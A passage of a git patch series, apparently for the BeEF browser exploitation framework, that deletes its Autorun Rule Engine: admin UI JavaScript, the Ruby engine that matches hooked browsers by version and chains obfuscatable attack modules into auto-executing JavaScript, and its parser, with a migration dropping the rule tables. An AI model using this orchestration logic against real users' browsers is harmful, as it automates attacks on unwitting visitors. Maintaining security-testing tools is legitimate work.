- xtype: 'combo', - id: chainModeComboId, - fieldLabel: 'Chain Mode', - store: ['sequential', 'nested-forward'], - queryMode: 'local', // Use local data. - triggerAction: 'all', // Show both options instead of just the default. - editable: false, // Disable manual text input. - forceSelection: true, - value: rule.chain_mode ? rule.chain_mode : 'sequential' - },{ - xtype: 'displayfield', - fieldLabel: 'Execution Order', - value: newRule.execution_order ? - JSON.stringify(newRule.execution_order) - : 'undefined', - },{ - xtype: 'displayfield', - fieldLabel: 'Execution Delay', - value: newRule.execution_delay ? - JSON.stringify(newRule.execution_delay) - : 'undefined', - } - ], - buttons: [{ - text: 'Delete', - handler: deleteFn - }, { - text: 'Save', - handler: handleUpdateRule - }], - border: false, - closable: false - }); -}; - -Ext.extend(AutoRunRuleForm, Ext.FormPanel, {}); \ No newline at end of file diff --git a/extensions/admin_ui/media/javascript/ui/panel/AutoRunTab.js b/extensions/admin_ui/media/javascript/ui/panel/AutoRunTab.js deleted file mode 100644 index 9a49483741..0000000000 --- a/extensions/admin_ui/media/javascript/ui/panel/AutoRunTab.js +++ /dev/null @@ -1,185 +0,0 @@ -const defaultRule = { - "name": "Display an alert", - "author": "mgeeky", - "modules": [ - { - "name": "alert_dialog", - "condition": null, - "options": { - "text":"You've been BeEFed ;>" - } - } - ], - "execution_order": [0], - "execution_delay": [0], - "chain_mode": "nested-forward" -}; - - - -/** - * Asynchronously returns the currently active rules in an array. - * Empty array means no rules are active. - * null if there was an error. - */ -getCurrentRules = async function(token) { - - try { - var res = await fetch(`/api/autorun/rules?token=${token}`); - if (!res.ok) { - throw new Error(`Getting auto run rules failed with status ${res.status}`); - } - const data = await res.json(); - const rules = JSON.parse(data.rules); - - if (data.success === true && Array.isArray(rules)) { - return rules; - } - - console.log("No active auto run rules."); - return []; - - } catch(error) { - console.error(error); - console.error("Failed to get auto run rules."); - return null; - } -} - -getModules = async function(token) { - try { - var res = await fetch(`/api/modules?token=${token}`); - if (!res.ok) { - throw new Error(`Getting auto run rules failed with status ${res.status}`); - } - const modules = await res.json(); - - return modules; - - } catch(error) { - console.error(error); - console.error("Failed to get auto run rules."); - return null; - } -} - -AutoRunTab = function() { - // RESTful API token. - var token = BeefWUI.get_rest_token(); - - // Heading container to describe general Auto Run state. - var ruleLoadingState = new Ext.Container({ - html: "<p>Loading Auto Run rules...</p>", - }) - var headingContainer = new Ext.Panel({ - style: { - font: '11px tahoma,arial,helvetica,sans-serif' - }, - padding:'10 10 10 10', - border: false, - items: [{ - xtype: 'container', - html: '\ - <div>\ - <h4>Auto Run Rules</h4>\ - <p>These determine what commands run automatically when a browser is hooked.</p>\ - </div>' - }, - ruleLoadingState, - { - xtype: 'button', - text: 'Add New Rule', - handler: addRule - }], - listeners: { - afterrender: loadRules - } - }); - // Contains all of the rules and inputs to change each rule. - var ruleContainer = new Ext.Panel({ - border: false, - listeners: { - afterrender: loadRules - } - }); - - async function deleteRule(id) { - const res = await fetch(`/api/autorun/rule/${id}?token=${token}`, {method: 'DELETE'}); - if (!res.ok) { - console.error(`Failed when deleting rule with id ${id}. Failed with status ${res.status}.`); - return; - } - // Update the entire rules panel. Not very efficient. - loadRules(); - } - - async function addRule() { - const res = await fetch(`/api/autorun/rule/add?token=${token}`, { - method: 'POST', - headers: {'Content-Type': 'application/json'}, - body: JSON.stringify(defaultRule) - }); - if (!res.ok) { - console.error(`Failed when adding a new rule with status ${res.status}.`); - return; - } - // Update the entire rules panel. Not very efficient. - loadRules(); - } - - async function updateRule(id, newRuleData) { - const res = await fetch(`/api/autorun/rule/${id}?token=${token}`, { - method: 'PATCH', - headers: {'Content-Type': 'application/json'}, - body: JSON.stringify(newRuleData) - }); - if (!res.ok) { - console.error(`Failed when adding a new rule with status ${res.status}.`); - return; - } - // Update the entire rules panel. Not very efficient. - loadRules(); - } - - async function loadRules() { - let modules = []; - let rules = []; - try { - modules = await getModules(token); - rules = await getCurrentRules(token); - } catch (error) { - console.error(error); - console.error("Failed to load command modules and/or rules for Auto Run."); - ruleLoadingState.update("<p>Failed to load Auto Run rules.</p>"); - return; - } - - if (rules !== null) { - ruleLoadingState.update(`<p>Loaded ${rules.length} Auto Run rules.</p>`); - ruleContainer.removeAll(); - - for (let i = 0; i < rules.length; i++) { - ruleForm = new AutoRunRuleForm( - rules[i], - modules, - function() {deleteRule(rules[i].id)}, - function(newRuleData) {updateRule(rules[i].id, newRuleData)} - ); - ruleContainer.add(ruleForm); - } - ruleContainer.doLayout(); - } else { - ruleLoadingState.update("<p>Failed to load Auto Run rules.</p>"); - } - } - - AutoRunTab.superclass.constructor.call(this, { - region: 'center', - items: [headingContainer, ruleContainer], - autoScroll: true, - border: false, - closable: false - }); -}; - -Ext.extend(AutoRunTab, Ext.Panel, {}); \ No newline at end of file diff --git a/extensions/admin_ui/media/javascript/ui/panel/MainPanel.js b/extensions/admin_ui/media/javascript/ui/panel/MainPanel.js index 49e58cb34c..13256911d6 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/MainPanel.js +++ b/extensions/admin_ui/media/javascript/ui/panel/MainPanel.js @@ -38,8 +38,6 @@ MainPanel = function(){ this.welcome_tab = new WelcomeTab; - this.auto_run_tab = new AutoRunTab; - MainPanel.superclass.constructor.call(this, { id:'main-tabs', activeTab:0, @@ -78,15 +76,6 @@ MainPanel = function(){ items:[ this.zombies_grid ] - }, - { - id:'autorun-view', - title:'Auto Run', - layout:'border', - hideMode:'offsets', - items:[ - this.auto_run_tab - ] }] }); From acc0eb5873974a1eb6a311dcb881fd8cba2e9a17 Mon Sep 17 00:00:00 2001 From: kaitoozawa <kaitozaw@gmail.com> Date: Sat, 27 Dec 2025 16:12:39 +1000 Subject: [PATCH 4/9] Phase 4: Remove Server-Side Core --- beef | 5 - core/bootstrap.rb | 6 - core/core.rb | 2 - .../026_remove_autorun_tables.rb | 11 + core/main/autorun_engine/engine.rb | 589 ------------------ core/main/autorun_engine/parser.rb | 82 --- core/main/autorun_engine/rule_loader.rb | 220 ------- core/main/handlers/browserdetails.rb | 4 - core/main/models/execution.rb | 14 - core/main/models/rule.rb | 16 - .../main/network_stack/websocket/websocket.rb | 12 - core/main/rest/handlers/autorun_engine.rb | 157 ----- .../autorun_engine/autorun_engine_spec.rb | 120 ---- 13 files changed, 11 insertions(+), 1227 deletions(-) create mode 100644 core/main/ar-migrations/026_remove_autorun_tables.rb delete mode 100644 core/main/autorun_engine/engine.rb delete mode 100644 core/main/autorun_engine/parser.rb delete mode 100644 core/main/autorun_engine/rule_loader.rb delete mode 100644 core/main/models/execution.rb delete mode 100644 core/main/models/rule.rb delete mode 100644 core/main/rest/handlers/autorun_engine.rb delete mode 100644 spec/beef/core/main/autorun_engine/autorun_engine_spec.rb diff --git a/beef b/beef index 1473848982..3fa40ffa60 100755 --- a/beef +++ b/beef @@ -266,11 +266,6 @@ BeEF::Core::GeoIp.instance # BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'pre_http_start', http_hook_server) -# -# @note Load any ARE (Autorun Rule Engine) rules scanning the <beef_root>/arerules/enabled directory -# -BeEF::Core::AutorunEngine::RuleLoader.instance.load_directory - # # @note Start the WebSocket server # diff --git a/core/bootstrap.rb b/core/bootstrap.rb index 4f69dbf372..20dd1a9570 100644 --- a/core/bootstrap.rb +++ b/core/bootstrap.rb @@ -29,11 +29,6 @@ module Core require 'core/main/network_stack/assethandler' require 'core/main/network_stack/api' -# @note Include the autorun engine -require 'core/main/autorun_engine/parser' -require 'core/main/autorun_engine/engine' -require 'core/main/autorun_engine/rule_loader' - ## @note Include helpers require 'core/module' require 'core/modules' @@ -49,7 +44,6 @@ module Core require 'core/main/rest/handlers/logs' require 'core/main/rest/handlers/admin' require 'core/main/rest/handlers/server' -require 'core/main/rest/handlers/autorun_engine' require 'core/main/rest/api' ## @note Include Websocket diff --git a/core/core.rb b/core/core.rb index 53ad3c72f6..3e2b6d51c1 100644 --- a/core/core.rb +++ b/core/core.rb @@ -17,8 +17,6 @@ module Core require 'core/main/models/result' require 'core/main/models/optioncache' require 'core/main/models/browserdetails' -require 'core/main/models/rule' -require 'core/main/models/execution' require 'core/main/models/legacybrowseruseragents' # @note Include the constants diff --git a/core/main/ar-migrations/026_remove_autorun_tables.rb b/core/main/ar-migrations/026_remove_autorun_tables.rb new file mode 100644 index 0000000000..261c4577d9 --- /dev/null +++ b/core/main/ar-migrations/026_remove_autorun_tables.rb @@ -0,0 +1,11 @@ +class RemoveAutorunTables < ActiveRecord::Migration[6.0] + def up + drop_table :executions if table_exists?(:executions) + drop_table :rules if table_exists?(:rules) + end + + def down + # Cannot recreate these tables - ARE functionality has been removed + raise ActiveRecord::IrreversibleMigration + end +end diff --git a/core/main/autorun_engine/engine.rb b/core/main/autorun_engine/engine.rb deleted file mode 100644 index d5621dba5a..0000000000 --- a/core/main/autorun_engine/engine.rb +++ /dev/null @@ -1,589 +0,0 @@ -# -# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net -# Browser Exploitation Framework (BeEF) - https://beefproject.com -# See the file 'doc/COPYING' for copying permission -# -module BeEF - module Core - module AutorunEngine - class Engine - include Singleton - - def initialize - @config = BeEF::Core::Configuration.instance - - @result_poll_interval = @config.get('beef.autorun.result_poll_interval') - @result_poll_timeout = @config.get('beef.autorun.result_poll_timeout') - @continue_after_timeout = @config.get('beef.autorun.continue_after_timeout') - - @debug_on = @config.get('beef.debug') - - @VERSION = ['<', '<=', '==', '>=', '>', 'ALL'] - @VERSION_STR = %w[XP Vista 7] - end - - # Checks if there are any ARE rules to be triggered for the specified hooked browser. - # - # Returns an array with rule IDs that matched and should be triggered. - # if rule_id is specified, checks will be executed only against the specified rule (useful - # for dynamic triggering of new rulesets ar runtime) - def find_matching_rules_for_zombie(browser, browser_version, os, os_version) - rules = BeEF::Core::Models::Rule.all - - return if rules.nil? - return if rules.empty? - - # TODO: handle cases where there are multiple ARE rules for the same hooked browser. - # maybe rules need to have priority or something? - - print_info '[ARE] Checking if any defined rules should be triggered on target.' - - match_rules = [] - rules.each do |rule| - next unless zombie_matches_rule?(browser, browser_version, os, os_version, rule) - - match_rules.push(rule.id) - print_more("Hooked browser and OS match rule: #{rule.name}.") - end - - print_more("Found [#{match_rules.length}/#{rules.length}] ARE rules matching the hooked browser.") - - match_rules - end - - # @return [Boolean] - # Note: browser version checks are supporting only major versions, ex: C 43, IE 11 - # Note: OS version checks are supporting major/minor versions, ex: OSX 10.10, Windows 8.1 - def zombie_matches_rule?(browser, browser_version, os, os_version, rule) - return false if rule.nil? - - unless zombie_browser_matches_rule?(browser, browser_version, rule) - print_debug("Browser version check -> (hook) #{browser_version} #{rule.browser_version} (rule) : does not match") - return false - end - - print_debug("Browser version check -> (hook) #{browser_version} #{rule.browser_version} (rule) : matched") - - unless zombie_os_matches_rule?(os, os_version, rule) - print_debug("OS version check -> (hook) #{os_version} #{rule.os_version} (rule): does not match") - return false - end - - print_debug("OS version check -> (hook) #{os_version} #{rule.os_version} (rule): matched") - - true - rescue StandardError => e - print_error e.message - print_debug e.backtrace.join("\n") - end - - # @return [Boolean] - # TODO: This should be updated to support matching multiple OS (like the browser check below) - def zombie_os_matches_rule?(os, os_version, rule) - return false if rule.nil? - - return false unless rule.os == 'ALL' || os == rule.os - - # check if the OS versions match - os_ver_rule_cond = rule.os_version.split(' ').first - - return true if os_ver_rule_cond == 'ALL' - - return false unless @VERSION.include?(os_ver_rule_cond) || @VERSION_STR.include?(os_ver_rule_cond) - - os_ver_rule_maj = rule.os_version.split(' ').last.split('.').first - os_ver_rule_min = rule.os_version.split(' ').last.split('.').last - - if os_ver_rule_maj == 'XP' - os_ver_rule_maj = 5 - os_ver_rule_min = 0 - elsif os_ver_rule_maj == 'Vista' - os_ver_rule_maj = 6 - os_ver_rule_min = 0 - elsif os_ver_rule_maj == '7' - os_ver_rule_maj = 6 - os_ver_rule_min = 0 - end - - # Most of the times Linux/*BSD OS doesn't return any version - # (TODO: improve OS detection on these operating systems) - if !os_version.nil? && !@VERSION_STR.include?(os_version) - os_ver_hook_maj = os_version.split('.').first - os_ver_hook_min = os_version.split('.').last - - # the following assignments to 0 are need for later checks like: - # 8.1 >= 7, because if the version doesn't have minor versions, maj/min are the same - os_ver_hook_min = 0 if os_version.split('.').length == 1 - os_ver_rule_min = 0 if rule.os_version.split('.').length == 1 - else - # XP is Windows 5.0 and Vista is Windows 6.0. Easier for comparison later on. - # TODO: BUG: This will fail horribly if the target OS is Windows 7 or newer, - # as no version normalization is performed. - # TODO: Update this for every OS since Vista/7 ... - if os_version == 'XP' - os_ver_hook_maj = 5 - os_ver_hook_min = 0 - elsif os_version == 'Vista' - os_ver_hook_maj = 6 - os_ver_hook_min = 0 - elsif os_version == '7' - os_ver_hook_maj = 6 - os_ver_hook_min = 0 - end - end - - if !os_version.nil? || rule.os_version != 'ALL' - os_major_version_match = compare_versions(os_ver_hook_maj.to_s, os_ver_rule_cond, os_ver_rule_maj.to_s) - os_minor_version_match = compare_versions(os_ver_hook_min.to_s, os_ver_rule_cond, os_ver_rule_min.to_s) - return false unless (os_major_version_match && os_minor_version_match) - end - - true - rescue StandardError => e - print_error e.message - print_debug e.backtrace.join("\n") - end - - # @return [Boolean] - def zombie_browser_matches_rule?(browser, browser_version, rule) - return false if rule.nil? - - b_ver_cond = rule.browser_version.split(' ').first - - return false unless @VERSION.include?(b_ver_cond) - - b_ver = rule.browser_version.split(' ').last - - return false unless BeEF::Filters.is_valid_browserversion?(b_ver) - - # check if rule specifies multiple browsers - if rule.browser =~ /\A[A-Z]+\Z/ - return false unless rule.browser == 'ALL' || browser == rule.browser - - # check if the browser version matches - browser_version_match = compare_versions(browser_version.to_s, b_ver_cond, b_ver.to_s) - return false unless browser_version_match - else - browser_match = false - rule.browser.gsub(/[^A-Z,]/i, '').split(',').each do |b| - if b == browser || b == 'ALL' - browser_match = true - break - end - end - return false unless browser_match - end - - true - rescue StandardError => e - print_error e.message - print_debug e.backtrace.join("\n") - end - - # Check if the hooked browser type/version and OS type/version match any Rule-sets - # stored in the BeEF::Core::Models::Rule database table - # If one or more Rule-sets do match, trigger the module chain specified - def find_and_run_all_matching_rules_for_zombie(hb_id) - return if hb_id.nil? - - hb_details = BeEF::Core::Models::BrowserDetails - browser_name = hb_details.get(hb_id, 'browser.name') - browser_version = hb_details.get(hb_id, 'browser.version') - os_name = hb_details.get(hb_id, 'host.os.name') - os_version = hb_details.get(hb_id, 'host.os.version') - - are = BeEF::Core::AutorunEngine::Engine.instance - rules = are.find_matching_rules_for_zombie(browser_name, browser_version, os_name, os_version) - - return if rules.nil? - return if rules.empty? - - are.run_rules_on_zombie(rules, hb_id) - end - - # Run the specified rule IDs on the specified zombie ID - # only if the rules match. - def run_matching_rules_on_zombie(rule_ids, hb_id) - return if rule_ids.nil? - return if hb_id.nil? - - rule_ids = [rule_ids.to_i] if rule_ids.is_a?(String) - - hb_details = BeEF::Core::Models::BrowserDetails - browser_name = hb_details.get(hb_id, 'browser.name') - browser_version = hb_details.get(hb_id, 'browser.version') - os_name = hb_details.get(hb_id, 'host.os.name') - os_version = hb_details.get(hb_id, 'host.os.version') - - are = BeEF::Core::AutorunEngine::Engine.instance - rules = are.find_matching_rules_for_zombie(browser_name, browser_version, os_name, os_version) - - return if rules.nil? - return if rules.empty? - - new_rules = [] - rules.each do |rule| - new_rules << rule if rule_ids.include?(rule) - end - - return if new_rules.empty? - - are.run_rules_on_zombie(new_rules, hb_id) - end - - # Run the specified rule IDs on the specified zombie ID - # regardless of whether the rules match. - # Prepare and return the JavaScript of the modules to be sent. - # It also updates the rules ARE execution table with timings - def run_rules_on_zombie(rule_ids, hb_id) - return if rule_ids.nil? - return if hb_id.nil? - - hb = BeEF::HBManager.get_by_id(hb_id) - hb_session = hb.session - - rule_ids = [rule_ids] if rule_ids.is_a?(Integer) - - rule_ids.each do |rule_id| - rule = BeEF::Core::Models::Rule.find(rule_id) - modules = JSON.parse(rule.modules) - - execution_order = JSON.parse(rule.execution_order) - execution_delay = JSON.parse(rule.execution_delay) - chain_mode = rule.chain_mode - - unless %w[sequential nested-forward].include?(chain_mode) - print_error("[ARE] Invalid chain mode '#{chain_mode}' for rule") - return - end - - mods_bodies = [] - mods_codes = [] - mods_conditions = [] - - # this ensures that if both rule A and rule B call the same module in sequential mode, - # execution will be correct preventing wrapper functions to be called with equal names. - rule_token = SecureRandom.hex(5) - - modules.each do |cmd_mod| - mod = BeEF::Core::Models::CommandModule.where(name: cmd_mod['name']).first - options = [] - replace_input = false - cmd_mod['options'].each do |k, v| - options.push({ 'name' => k, 'value' => v }) - replace_input = true if v == '<<mod_input>>' - end - - command_body = prepare_command(mod, options, hb_id, replace_input, rule_token) - - mods_bodies.push(command_body) - mods_codes.push(cmd_mod['code']) - mods_conditions.push(cmd_mod['condition']) - end - - # Depending on the chosen chain mode (sequential or nested/forward), prepare the appropriate wrapper - case chain_mode - when 'nested-forward' - wrapper = prepare_nested_forward_wrapper(mods_bodies, mods_codes, mods_conditions, execution_order, rule_token) - when 'sequential' - wrapper = prepare_sequential_wrapper(mods_bodies, execution_order, execution_delay, rule_token) - else - # we should never get here. chain mode is validated earlier. - print_error("[ARE] Invalid chain mode '#{chain_mode}'") - next - end - - print_more "Triggering rules #{rule_ids} on HB #{hb_id}" - - are_exec = BeEF::Core::Models::Execution.new( - session_id: hb_session, - mod_count: modules.length, - mod_successful: 0, - rule_token: rule_token, - mod_body: wrapper, - is_sent: false, - rule_id: rule_id - ) - are_exec.save! - end - end - - private - - # Wraps module bodies in their own function, using setTimeout to trigger them with an eventual delay. - # Launch order is also taken care of. - # - sequential chain with delays (setTimeout stuff) - # ex.: setTimeout(module_one(), 0); - # setTimeout(module_two(), 2000); - # setTimeout(module_three(), 3000); - # Note: no result status is checked here!! Useful if you just want to launch a bunch of modules without caring - # what their status will be (for instance, a bunch of XSRFs on a set of targets) - def prepare_sequential_wrapper(mods, order, delay, rule_token) - wrapper = '' - delayed_exec = '' - c = 0 - while c < mods.length - delayed_exec += %| setTimeout(function(){#{mods[order[c]][:mod_name]}_#{rule_token}();}, #{delay[c]}); | - mod_body = mods[order[c]][:mod_body].to_s.gsub("#{mods[order[c]][:mod_name]}_mod_output", "#{mods[order[c]][:mod_name]}_#{rule_token}_mod_output") - wrapped_mod = "#{mod_body}\n" - wrapper += wrapped_mod - c += 1 - end - wrapper += delayed_exec - print_more "Final Modules Wrapper:\n #{wrapper}" if @debug_on - wrapper - end - - # Wraps module bodies in their own function, then start to execute them from the first, polling for - # command execution status/results (with configurable polling interval and timeout). - # Launch order is also taken care of. - # - nested forward chain with status checks (setInterval to wait for command to return from async operations) - # ex.: module_one() - # if condition - # module_two(module_one_output) - # if condition - # module_three(module_two_output) - # - # Note: command result status is checked, and you can properly chain input into output, having also - # the flexibility of slightly mangling it to adapt to module needs. - # Note: Useful in situations where you want to launch 2 modules, where the second one will execute only - # if the first once return with success. Also, the second module has the possibility of mangling first - # module output and use it as input for some of its module inputs. - def prepare_nested_forward_wrapper(mods, code, conditions, order, rule_token) - wrapper = '' - delayed_exec = '' - delayed_exec_footers = [] - c = 0 - - while c < mods.length - i = if mods.length == 1 - c - else - c + 1 - end - - code_snippet = '' - mod_input = '' - if code[c] != 'null' && code[c] != '' - code_snippet = code[c] - mod_input = 'mod_input' - end - - conditions[i] = true if conditions[i].nil? || conditions[i] == '' - - if c == 0 - # this is the first wrapper to prepare - delayed_exec += %| - function #{mods[order[c]][:mod_name]}_#{rule_token}_f(){ - #{mods[order[c]][:mod_name]}_#{rule_token}(); - - // TODO add timeout to prevent infinite loops - function isResReady(mod_result, start){ - if (mod_result === null && parseInt(((new Date().getTime()) - start)) < #{@result_poll_timeout}){ - // loop - }else{ - // module return status/data is now available - clearInterval(resultReady); - if (mod_result === null && #{@continue_after_timeout}){ - var mod_result = []; - mod_result[0] = 1; //unknown status - mod_result[1] = '' //empty result - } - var status = mod_result[0]; - if(#{conditions[i]}){ - #{mods[order[i]][:mod_name]}_#{rule_token}_can_exec = true; - #{mods[order[c]][:mod_name]}_#{rule_token}_mod_output = mod_result[1]; - | - - delayed_exec_footer = %| - } - } - } - var start = (new Date()).getTime(); - var resultReady = setInterval(function(){var start = (new Date()).getTime(); isResReady(#{mods[order[c]][:mod_name]}_#{rule_token}_mod_output, start);},#{@result_poll_interval}); - } - #{mods[order[c]][:mod_name]}_#{rule_token}_f(); - | - - delayed_exec_footers.push(delayed_exec_footer) - - elsif c < mods.length - 1 - code_snippet = code_snippet.to_s.gsub(mods[order[c - 1]][:mod_name], "#{mods[order[c - 1]][:mod_name]}_#{rule_token}") - - # this is one of the wrappers in the middle of the chain - delayed_exec += %| - function #{mods[order[c]][:mod_name]}_#{rule_token}_f(){ - if(#{mods[order[c]][:mod_name]}_#{rule_token}_can_exec){ - #{code_snippet} - #{mods[order[c]][:mod_name]}_#{rule_token}(#{mod_input}); - function isResReady(mod_result, start){ - if (mod_result === null && parseInt(((new Date().getTime()) - start)) < #{@result_poll_timeout}){ - // loop - }else{ - // module return status/data is now available - clearInterval(resultReady); - if (mod_result === null && #{@continue_after_timeout}){ - var mod_result = []; - mod_result[0] = 1; //unknown status - mod_result[1] = '' //empty result - } - var status = mod_result[0]; - if(#{conditions[i]}){ - #{mods[order[i]][:mod_name]}_#{rule_token}_can_exec = true; - #{mods[order[c]][:mod_name]}_#{rule_token}_mod_output = mod_result[1]; - | - - delayed_exec_footer = %| - } - } - } - var start = (new Date()).getTime(); - var resultReady = setInterval(function(){ isResReady(#{mods[order[c]][:mod_name]}_#{rule_token}_mod_output, start);},#{@result_poll_interval}); - } - } - #{mods[order[c]][:mod_name]}_#{rule_token}_f(); - | - - delayed_exec_footers.push(delayed_exec_footer) - else - code_snippet = code_snippet.to_s.gsub(mods[order[c - 1]][:mod_name], "#{mods[order[c - 1]][:mod_name]}_#{rule_token}") - # this is the last wrapper to prepare - delayed_exec += %| - function #{mods[order[c]][:mod_name]}_#{rule_token}_f(){ - if(#{mods[order[c]][:mod_name]}_#{rule_token}_can_exec){ - #{code_snippet} - #{mods[order[c]][:mod_name]}_#{rule_token}(#{mod_input}); - } - } - #{mods[order[c]][:mod_name]}_#{rule_token}_f(); - | - end - mod_body = mods[order[c]][:mod_body].to_s.gsub("#{mods[order[c]][:mod_name]}_mod_output", "#{mods[order[c]][:mod_name]}_#{rule_token}_mod_output") - wrapped_mod = "#{mod_body}\n" - wrapper += wrapped_mod - c += 1 - end - wrapper += delayed_exec + delayed_exec_footers.reverse.join("\n") - print_more "Final Modules Wrapper:\n #{delayed_exec + delayed_exec_footers.reverse.join("\n")}" if @debug_on - wrapper - end - - # prepare the command module (compiling the Erubis templating stuff), eventually obfuscate it, - # and store it in the database. - # Returns the raw module body after template substitution. - def prepare_command(mod, options, hb_id, replace_input, rule_token) - config = BeEF::Core::Configuration.instance - begin - command = BeEF::Core::Models::Command.new( - data: options.to_json, - hooked_browser_id: hb_id, - command_module_id: BeEF::Core::Configuration.instance.get("beef.module.#{mod.name}.db.id"), - creationdate: Time.new.to_i, - instructions_sent: true - ) - command.save! - - command_module = BeEF::Core::Models::CommandModule.find(mod.id) - if command_module.path.match(/^Dynamic/) - # metasploit and similar integrations - command_module = BeEF::Modules::Commands.const_get(command_module.path.split('/').last.capitalize).new - else - # normal modules always here - key = BeEF::Module.get_key_by_database_id(mod.id) - command_module = BeEF::Core::Command.const_get(config.get("beef.module.#{key}.class")).new(key) - end - - hb = BeEF::HBManager.get_by_id(hb_id) - hb_session = hb.session - command_module.command_id = command.id - command_module.session_id = hb_session - command_module.build_datastore(command.data) - command_module.pre_send - - build_missing_beefjs_components(command_module.beefjs_components) unless command_module.beefjs_components.empty? - - if config.get('beef.extension.evasion.enable') - evasion = BeEF::Extension::Evasion::Evasion.instance - command_body = evasion.obfuscate(command_module.output) + "\n\n" - else - command_body = command_module.output + "\n\n" - end - - # @note prints the event to the console - print_more "Preparing JS for command id [#{command.id}], module [#{mod.name}]" - - mod_input = replace_input ? 'mod_input' : '' - result = %| - var #{mod.name}_#{rule_token} = function(#{mod_input}){ - #{clean_command_body(command_body, replace_input)} - }; - var #{mod.name}_#{rule_token}_can_exec = false; - var #{mod.name}_#{rule_token}_mod_output = null; - | - - { mod_name: mod.name, mod_body: result } - rescue StandardError => e - print_error e.message - print_debug e.backtrace.join("\n") - end - end - - # Removes the beef.execute wrapper in order that modules are executed in the ARE wrapper, rather than - # using the default behavior of adding the module to an array and execute it at polling time. - # - # Also replace <<mod_input>> with mod_input variable if needed for chaining module output/input - def clean_command_body(command_body, replace_input) - cmd_body = command_body.lines.map(&:chomp) - wrapper_start_index, wrapper_end_index = nil - - cmd_body.each_with_index do |line, index| - if line.to_s =~ /^(beef|[a-zA-Z]+)\.execute\(function\(\)/ - wrapper_start_index = index - break - end - end - print_error '[ARE] Could not find module start index' if wrapper_start_index.nil? - - cmd_body.reverse.each_with_index do |line, index| - if line.include?('});') - wrapper_end_index = index - break - end - end - print_error '[ARE] Could not find module end index' if wrapper_end_index.nil? - - cleaned_cmd_body = cmd_body.slice(wrapper_start_index..-(wrapper_end_index + 1)).join("\n") - - print_error '[ARE] No command to send' if cleaned_cmd_body.eql?('') - - # check if <<mod_input>> should be replaced with a variable name (depending if the variable is a string or number) - return cleaned_cmd_body unless replace_input - - if cleaned_cmd_body.include?('"<<mod_input>>"') - cleaned_cmd_body.gsub('"<<mod_input>>"', 'mod_input') - elsif cleaned_cmd_body.include?('\'<<mod_input>>\'') - cleaned_cmd_body.gsub('\'<<mod_input>>\'', 'mod_input') - elsif cleaned_cmd_body.include?('<<mod_input>>') - cleaned_cmd_body.gsub('\'<<mod_input>>\'', 'mod_input') - else - cleaned_cmd_body - end - rescue StandardError => e - print_error "[ARE] There is likely a problem with the module's command.js parsing. Check Engine.clean_command_body. #{e.message}" - end - - # compare versions - def compare_versions(ver_a, cond, ver_b) - return true if cond == 'ALL' - return true if cond == '==' && ver_a == ver_b - return true if cond == '<=' && ver_a <= ver_b - return true if cond == '<' && ver_a < ver_b - return true if cond == '>=' && ver_a >= ver_b - return true if cond == '>' && ver_a > ver_b - - false - end - end - end - end -end diff --git a/core/main/autorun_engine/parser.rb b/core/main/autorun_engine/parser.rb deleted file mode 100644 index 0b02fa9ae7..0000000000 --- a/core/main/autorun_engine/parser.rb +++ /dev/null @@ -1,82 +0,0 @@ -# -# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net -# Browser Exploitation Framework (BeEF) - https://beefproject.com -# See the file 'doc/COPYING' for copying permission -# -module BeEF - module Core - module AutorunEngine - class Parser - include Singleton - - def initialize - @config = BeEF::Core::Configuration.instance - end - - BROWSER = %w[FF C IE S O ALL] - OS = %w[Linux Windows OSX Android iOS BlackBerry ALL] - VERSION = ['<', '<=', '==', '>=', '>', 'ALL', 'Vista', 'XP'] - CHAIN_MODE = %w[sequential nested-forward] - MAX_VER_LEN = 15 - - def parse(name, author, browser, browser_version, os, os_version, modules, execution_order, execution_delay, chain_mode) - raise ArgumentError, "Invalid rule name: #{name}" unless BeEF::Filters.is_non_empty_string?(name) - raise ArgumentError, "Invalid author name: #{author}" unless BeEF::Filters.is_non_empty_string?(author) - raise ArgumentError, "Invalid chain_mode definition: #{chain_mode}" unless CHAIN_MODE.include?(chain_mode) - raise ArgumentError, "Invalid os definition: #{os}" unless OS.include?(os) - - unless modules.size == execution_delay.size - raise ArgumentError, "Number of execution_delay values (#{execution_delay.size}) must be consistent with number of modules (#{modules.size})" - end - execution_delay.each { |delay| raise TypeError, "Invalid execution_delay value: #{delay}. Values must be Integers." unless delay.is_a?(Integer) } - - unless modules.size == execution_order.size - raise ArgumentError, "Number of execution_order values (#{execution_order.size}) must be consistent with number of modules (#{modules.size})" - end - execution_order.each { |order| raise TypeError, "Invalid execution_order value: #{order}. Values must be Integers." unless order.is_a?(Integer) } - - # if multiple browsers were specified, check each browser - if browser.is_a?(Array) - browser.each do |b| - raise ArgumentError, "Invalid browser definition: #{browser}" unless BROWSER.include?(b) - end - # else, if only one browser was specified, check browser and browser version - else - raise ArgumentError, "Invalid browser definition: #{browser}" unless BROWSER.include?(browser) - - if browser_version != 'ALL' && !(VERSION.include?(browser_version[0, 2].gsub(/\s+/, '')) && - BeEF::Filters.is_valid_browserversion?(browser_version[2..-1].gsub(/\s+/, '')) && browser_version.length < MAX_VER_LEN) - raise ArgumentError, "Invalid browser_version definition: #{browser_version}" - end - end - - if os_version != 'ALL' && !(VERSION.include?(os_version[0, 2].gsub(/\s+/, '')) && - BeEF::Filters.is_valid_osversion?(os_version[2..-1].gsub(/\s+/, '')) && os_version.length < MAX_VER_LEN) - return ArgumentError, "Invalid os_version definition: #{os_version}" - end - - # check if module names, conditions and options are ok - modules.each do |cmd_mod| - mod = BeEF::Core::Models::CommandModule.where(name: cmd_mod['name']).first - - raise "The specified module name (#{cmd_mod['name']}) does not exist" if mod.nil? - - modk = BeEF::Module.get_key_by_database_id(mod.id) - mod_options = BeEF::Module.get_options(modk) - - opt_count = 0 - mod_options.each do |opt| - if opt['name'] != cmd_mod['options'].keys[opt_count] - raise ArgumentError, "The specified option (#{cmd_mod['options'].keys[opt_count]}) for module (#{cmd_mod['name']}) was not specified" - end - - opt_count += 1 - end - end - - true - end - end - end - end -end diff --git a/core/main/autorun_engine/rule_loader.rb b/core/main/autorun_engine/rule_loader.rb deleted file mode 100644 index 3a78f9cb0b..0000000000 --- a/core/main/autorun_engine/rule_loader.rb +++ /dev/null @@ -1,220 +0,0 @@ -# -# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net -# Browser Exploitation Framework (BeEF) - https://beefproject.com -# See the file 'doc/COPYING' for copying permission -# -module BeEF - module Core - module AutorunEngine - class RuleLoader - include Singleton - - def 